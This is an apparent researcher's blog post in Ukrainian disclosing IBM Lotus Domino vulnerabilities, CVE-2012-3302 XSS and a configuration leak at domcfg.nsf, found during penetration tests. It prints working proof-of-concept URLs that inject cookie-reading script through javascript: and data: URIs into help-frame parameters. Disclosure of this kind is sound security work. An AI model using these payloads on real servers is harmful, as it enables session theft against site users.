Уразливості в IBM Lotus Domino

23:53 27.08.2012

15.05.2012

Ще в березні 2008, під час пентесту, я знайшов чимало уразливостей в IBM Lotus Domino. Деякі з них IBM вже виправила, деякі ні, а деякі виправила неякісно.

І у травні, 03.05.2012, під час нового пентесту, я виявив багато уразливостей в IBM Lotus Domino (деякі старі та багато нових), зокрема Cross-Site Scripting та Information Leakage. Це перша порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2012

CVE: CVE-2012-3302

XSS (WASC-08):

Дана XSS в березні 2008 працювала наступним чином:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

З тих пір вектор атаки через javascript: URI був виправлений, але існує можливість атаки через data: і vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

На сторінці https://site/domcfg.nsf, що доступна без аутентифікації, має місце витік інформації про конфігурацію веб сервера. Таку ситуацію я зустрічав на багатьох сайтах на Lotus Domino.

Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили XSS уразливості в версії 8.5.4. Стосовно Information Leakage та інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням.


Leave a Reply

You must be logged in to post a comment.